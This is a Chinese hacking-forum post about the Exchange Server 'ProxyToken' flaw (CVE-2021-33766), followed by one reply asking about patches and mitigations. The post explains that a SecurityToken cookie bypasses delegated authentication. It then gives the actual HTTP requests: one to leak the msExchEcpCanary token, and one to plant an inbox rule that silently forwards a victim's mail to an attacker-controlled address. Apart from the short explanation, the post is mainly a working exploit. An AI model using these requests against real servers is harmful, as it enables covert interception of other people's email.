搜索
红客联盟 - 由08小组运营»社区首页 技术攻防 漏洞情报 ExchangeServer email窃听漏洞-PROXYTOKEN (CVE-2021-33 ...
查看: 26926|回复: 1

ExchangeServer email窃听漏洞-PROXYTOKEN (CVE-2021-33766)

[复制链接]
匿名
匿名  发表于 2021-9-2 21:23:10 |阅读模式
漏洞原因:
漏洞出现在“委托身份验证”的功能中,如果前端header中存在非空的SecurityToken的Cookie时,就会直接请求后端服务,不会加载委托认证的模块(DelegatedAuthModule)。

1. 向受目标服务器请求poc泄露msExchEcpCanary
[AppleScript] 查看源码 复制代码
POST /ecp/test1@test.com/RulesEditor/InboxRules.svc/NewObject
...
Cookie: SecurityToken=x
...

2. 在response 500 错误的header中找到msExchEcpCanary

3. 使用 msExchEcpCanary 值代入,请求设置转发规则
[AppleScript] 查看源码 复制代码
POST /ecp/RulesEditor/InboxRules.svc/NewObject?msExchEcpCanary=$token
...
Cookie: SecurityToken=x
...
{"properties":{"ForwardTo":[{"RawIdentity":"myemail@test.com","DisplayName":"myemail","Address":"myemail@test.com","AddressOrigin":3,"RecipientFlag":0,"RoutingType":"SMTP","SMTPAddress":"myemail@test.com"}],"Name":"test","StopProcessingRules":"true"}}
回复

使用道具 举报

热心网友7
发表于 5 天前 | 显示全部楼层

Re: ExchangeServer email窃听漏洞-PROXYTOKEN (CVE-2021-33766)

感谢分享这个漏洞的技术细节,分析得很清楚。请问目前微软针对 CVE-2021-33766 是否有官方补丁或安全更新?另外,作为管理员,除了打补丁,有没有临时缓解措施(比如禁用委托身份验证或调整相关配置)可以推荐?
回复 支持 反对

使用道具 举报

返回列表 发帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-5-24 18:13 , Processed in 0.023371 second(s), 18 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部